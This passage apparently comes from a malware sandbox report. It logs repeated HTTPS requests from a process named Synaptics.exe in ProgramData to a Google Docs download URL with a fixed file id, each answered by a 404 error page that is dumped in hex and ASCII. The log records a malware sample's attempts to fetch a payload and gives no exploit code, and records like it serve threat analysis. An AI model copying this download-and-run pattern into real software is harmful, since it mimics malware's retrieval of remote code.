                                                                                                                                                                                        2022-05-17 11:31:57 UTC627INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:57 UTC628INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        207192.168.2.349981142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:57 UTC625OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:57 UTC628INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:57 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-HGNHVVRPfe3A+RDrGdJ7Aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:57 UTC629INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:57 UTC629INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 68 39 30 77 49 37 4a 6b 37 6e 58 68 74 39 6e 51 67 63 4a 61 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zh90wI7Jk7nXht9nQgcJaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:57 UTC630INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:57 UTC631INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        208192.168.2.349982142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:57 UTC628OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:57 UTC631INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:57 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-JciMFMDUWc1acnLUQuoRiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:57 UTC632INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:57 UTC632INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 45 2f 43 2f 46 74 4e 4b 2b 56 43 73 6c 58 47 6e 5a 6d 63 35 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oE/C/FtNK+VCslXGnZmc5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:57 UTC633INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:57 UTC634INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        209192.168.2.349983142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:57 UTC631OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:57 UTC634INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:57 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ywASHw+D8BbFYVjFS+EpJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:57 UTC635INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:57 UTC635INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2f 4b 5a 47 48 59 36 67 74 48 32 4d 38 63 49 31 71 6b 53 52 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/KZGHY6gtH2M8cI1qkSRSw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:57 UTC636INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:57 UTC637INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        21192.168.2.349759142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:31 UTC62OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:31 UTC65INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:31 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-zjda+b4+N7VTlSCb9cRb1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:31 UTC67INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2b 32 33 34 59 65 7a 72 31 76 73 55 52 66 52 53 68 73 66 6a 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="+234Yezr1vsURfRShsfjgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:31 UTC68INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:31 UTC69INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        210192.168.2.349985142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:57 UTC634OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:57 UTC637INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:57 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BIOS7414HiQRnRrzB5tFhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:57 UTC638INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:57 UTC638INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 30 63 50 5a 50 6b 46 34 76 45 49 50 4e 69 58 6b 36 70 6d 63 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U0cPZPkF4vEIPNiXk6pmcA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
